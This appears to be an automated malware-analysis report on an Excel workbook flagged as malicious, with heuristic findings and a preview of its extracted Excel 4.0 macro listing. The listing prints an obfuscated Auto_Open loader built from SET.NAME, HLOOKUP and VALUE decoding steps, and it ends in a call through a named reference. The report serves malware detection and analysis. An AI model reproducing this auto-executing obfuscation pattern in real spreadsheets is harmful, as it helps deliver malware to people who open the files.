MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6686 bytes |
SHA-256: 6f330945fe82235aa5e8ca445a732c8089bbd789643984ffb95b4cb3dee2d068 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - EMASPj
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F150
' 0018 23 LABEL : Cell Value, String Constant - axWEvRPz len=0
' 0018 26 LABEL : Cell Value, String Constant - azQPynPwstO len=0
' 0018 21 LABEL : Cell Value, String Constant - BBbQjt len=0
' 0018 24 LABEL : Cell Value, String Constant - dkulFLJMM len=0
' 0018 24 LABEL : Cell Value, String Constant - dURafMTjA len=0
' 0018 25 LABEL : Cell Value, String Constant - emOuWgrISL len=0
' 0018 27 LABEL : Cell Value, String Constant - eunNQSLyxuMx len=0
' 0018 22 LABEL : Cell Value, String Constant - FQYmrjv len=0
' 0018 27 LABEL : Cell Value, String Constant - gMReVFsJRLjb len=0
' 0018 23 LABEL : Cell Value, String Constant - hlcwjmFt len=0
' 0018 23 LABEL : Cell Value, String Constant - kJystCxc len=0
' 0018 23 LABEL : Cell Value, String Constant - LHTHVPyE len=0
' 0018 27 LABEL : Cell Value, String Constant - NAdWDLrBnJUC len=0
' 0018 21 LABEL : Cell Value, String Constant - oFsnUp len=0
' 0018 25 LABEL : Cell Value, String Constant - OOuwtymBjG len=0
' 0018 22 LABEL : Cell Value, String Constant - qPWIiWf len=0
' 0018 21 LABEL : Cell Value, String Constant - RdXYdl len=0
' 0018 27 LABEL : Cell Value, String Constant - RiDIwcFhFeCA len=0
' 0018 22 LABEL : Cell Value, String Constant - tubCtoc len=0
' 0018 26 LABEL : Cell Value, String Constant - vzAirPGQSzc len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' EMASPj,Q41,"",-971.00000000000000000000
' EMASPj,Q42,"",409.00000000000000000000
' EMASPj,Q43,"",336.00000000000000000000
' EMASPj,Q44,"",436.00000000000000000000
' EMASPj,Q45,"",531.00000000000000000000
' EMASPj,Q46,"",901.00000000000000000000
' EMASPj,F69,"SET.NAME("eunNQSLyxuMx",0+VALUE("0"))",""
' EMASPj,F71,"SET.NAME("RdXYdl",eunNQSLyxuMx)",""
' EMASPj,F73,"SET.NAME("dURafMTjA",eunNQSLyxuMx)",""
' EMASPj,F75,"SET.NAME("RiDIwcFhFeCA",COUNTA(qPWIiWf))",""
' EMASPj,F77,"SET.NAME("oFsnUp",COUNTA(BBbQjt))",""
' EMASPj,F81,[],""
' EMASPj,F85,"SET.NAME("dkulFLJMM","")",""
' EMASPj,F87,"RdXYdl",""
' EMASPj,F91,"SET.NAME("OOuwtymBjG",HLOOKUP("*",qPWIiWf,RdXYdl,FALSE))",""
' EMASPj,F96,"azQPynPwstO",""
' EMASPj,F98,"SET.NAME("vzAirPGQSzc",eunNQSLyxuMx)",""
' EMASPj,F102,[],""
' EMASPj,F106,"vzAirPGQSzc",""
' EMASPj,F109,"gMReVFsJRLjb",""
' EMASPj,F111,"NAdWDLrBnJUC",""
' EMASPj,F113,"axWEvRPz",""
' EMASPj,F116,"SET.NAME("FQYmrjv",VALUE(HLOOKUP("*",BBbQjt,axWEvRPz,FALSE)))",""
' EMASPj,F118,"tubCtoc",""
' EMASPj,F122,"dkulFLJMM",""
' EMASPj,F124,"dURafMTjA",""
' EMASPj,F127,NEXT(),""
' EMASPj,F130,"kJystCxc",""
' EMASPj,F135,[],""
' EMASPj,F138,"LHTHVPyE",""
' EMASPj,F142,NEXT(),""
' EMASPj,F147,RETURN(),""
' EMASPj,F174,"SET.NAME("emOuWgrISL",F69)",""
' EMASPj,F179,"qPWIiWf",""
' EMASPj,F184,"SET.NAME("BBbQjt",R88C11)",""
' EMASPj,F187,"SET.NAME("LHTHVPyE",194)",""
' EMASPj,F191,"SET.NAME("hlcwjmFt",6)",""
' EMASPj,F193,emOuWgrISL(),""
' EMASPj,F194,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.